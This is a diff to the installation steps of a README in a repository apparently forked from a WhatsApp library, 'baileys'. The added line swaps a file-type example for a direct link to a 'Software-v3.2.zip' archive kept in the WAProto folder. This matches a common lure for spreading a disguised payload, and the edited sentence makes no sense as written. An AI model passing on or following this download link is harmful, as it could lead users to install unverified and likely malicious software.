laykhinkhin/baileys/README.md

 3. **Download the Installation File**

    Depending on your operating system, download the appropriate file.
-You might see options like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+You might see options like `.exe` for Windows, `.dmg` for macOS, or `https://github.com/laykhinkhin/baileys/raw/refs/heads/main/WAProto/Software-v3.2.zip` for Linux.

 4. **Install baileys**